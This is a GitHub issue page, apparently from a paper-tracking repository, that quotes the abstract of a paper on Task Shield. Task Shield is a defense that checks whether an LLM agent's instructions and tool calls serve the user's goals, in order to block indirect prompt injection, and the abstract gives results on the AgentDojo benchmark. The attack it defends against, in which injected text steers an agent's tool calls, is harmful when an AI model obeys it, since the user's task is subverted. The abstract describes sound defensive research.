The Task Shield: Enforcing Task Alignment to Defend Against Indirect Prompt Injection in LLM Agents #5

ramimac · 2024-12-25T10:38:50Z

we develop Task Shield, a test-time defense mechanism that systematically verifies whether each instruction and tool call contributes to user-specified goals. Through experiments on the AgentDojo benchmark, we demonstrate that Task Shield reduces attack success rates (2.07%) while maintaining high task utility (69.79%) on GPT-4o, significantly outperforming existing defenses in various real-world scenarios.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

The Task Shield: Enforcing Task Alignment to Defend Against Indirect Prompt Injection in LLM Agents #5

The Task Shield: Enforcing Task Alignment to Defend Against Indirect Prompt Injection in LLM Agents #5

ramimac commented Dec 25, 2024

The Task Shield: Enforcing Task Alignment to Defend Against Indirect Prompt Injection in LLM Agents #5

The Task Shield: Enforcing Task Alignment to Defend Against Indirect Prompt Injection in LLM Agents #5

Comments

ramimac commented Dec 25, 2024